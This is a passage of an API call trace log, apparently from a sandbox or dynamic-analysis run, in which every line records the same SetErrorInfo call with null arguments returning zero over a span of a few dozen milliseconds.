[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.550] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.555] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.556] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.556] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.557] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.557] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.557] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.557] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.557] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.557] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.558] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.558] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.558] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.558] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.558] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.558] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.558] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.559] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.559] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.559] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.559] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.559] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.559] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.559] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.560] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.560] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.560] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.560] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.560] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.560] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.560] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.560] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.561] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.561] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.561] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.561] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.561] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.561] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.561] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.561] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.562] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.562] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.562] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.562] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.562] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.562] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.562] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.562] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.563] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.563] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.563] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.563] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.563] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.563] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.563] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.563] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.564] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.564] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.564] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.564] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.564] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.564] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.564] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.564] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.565] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.565] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.565] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.565] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.565] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.565] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.565] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.565] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.566] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.566] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.566] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.566] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.566] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.566] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.566] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.566] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.578] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.578] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.578] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.579] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.579] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.579] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.579] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.579] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.582] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.583] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.585] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.586] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.587] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.590] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.590] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.591] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.591] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.591] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.591] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.591] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.591] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.592] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.593] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
